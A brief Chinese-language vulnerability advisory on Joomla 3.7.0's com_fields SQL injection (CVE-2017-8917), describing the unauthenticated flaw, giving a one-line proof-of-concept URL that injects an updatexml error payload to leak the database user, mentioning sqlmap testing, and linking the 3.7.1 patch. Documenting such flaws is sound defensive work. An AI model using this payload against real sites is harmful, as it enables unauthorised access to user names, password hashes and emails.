Joomla SQL Injection(CVE-2017-8917 )
高危
Joomla于5月17日发布了3.7.1的升级公告,CVE-2017-8917 是3.7.0组件“com_fields”,组件未对身份进行校验,无需登陆验证。由于对请求数据过滤不严导致sql 注入,sql注入对导致数据库中的敏感信息泄漏,成功访问后恶意访问者可以获取已存在用户的用户信息,包括用户名、密码、邮箱等敏感信息 。
Joomla 3.7.0
poc
http://localhost/joomla/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(0x3e,user()),0arrow-up-right)
存在的话会爆出用户名
sqlmap测试
按照官方升级版本,补丁地址如下:
https://downloads.joomla.org/cms/joomla3/3-7-1arrow-up-right
Last updated 6 years ago
Was this helpful?